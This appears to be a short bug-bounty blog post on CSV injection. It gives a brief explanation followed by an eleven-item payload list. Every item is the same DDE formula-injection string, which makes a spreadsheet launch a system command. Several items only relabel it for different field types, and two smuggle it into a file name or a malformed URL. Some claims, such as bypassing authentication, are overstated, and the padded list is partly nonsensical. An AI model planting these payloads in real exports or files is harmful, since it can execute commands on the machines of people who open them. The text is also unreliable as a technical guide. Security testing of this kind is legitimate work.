CSV Injection and Payloads

What is CSV Injection

CSV injection is a type of attack in which malicious code is inserted into a comma-separated values (CSV) file. The malicious code is then executed when the file is processed, allowing attackers to gain access to sensitive information or perform malicious actions. CSV injection can be used to bypass authentication and authorization mechanisms, modify data, and gain access to sensitive files. It can also be used to exploit cross-site scripting (XSS) and server-side request forgery (SSRF) vulnerabilities.

Payloads

1. Inserting malicious code into formula fields, such as “=cmd|’ /C calc’!A0”

2. Inserting malicious code into header cells, such as “=cmd|’ /C calc’!A0”

3. Inserting malicious code into data cells, such as “=cmd|’ /C calc’!A0”

4. Inserting malicious code into comments, such as “=cmd|’ /C calc’!A0”

5. Inserting malicious code into the file name, such as “malicious.csv;cmd|’ /C calc’!A0”

6. Inserting malicious code into text fields, such as “=cmd|’ /C calc’!A0”

7. Inserting malicious code into numeric fields, such as “=cmd|’ /C calc’!A0”

8. Inserting malicious code into date fields, such as “=cmd|’ /C calc’!A0”

9. Inserting malicious code into currency fields, such as “=cmd|’ /C calc’!A0”

10. Inserting malicious code into boolean fields, such as “=cmd|’ /C calc’!A0”

11. Inserting malicious code into URLs, such as “htp://example.com/malicious.csv;cmd|’ /C calc’!A0”

Tags: bug bounty, CSV, CSV injection, payloads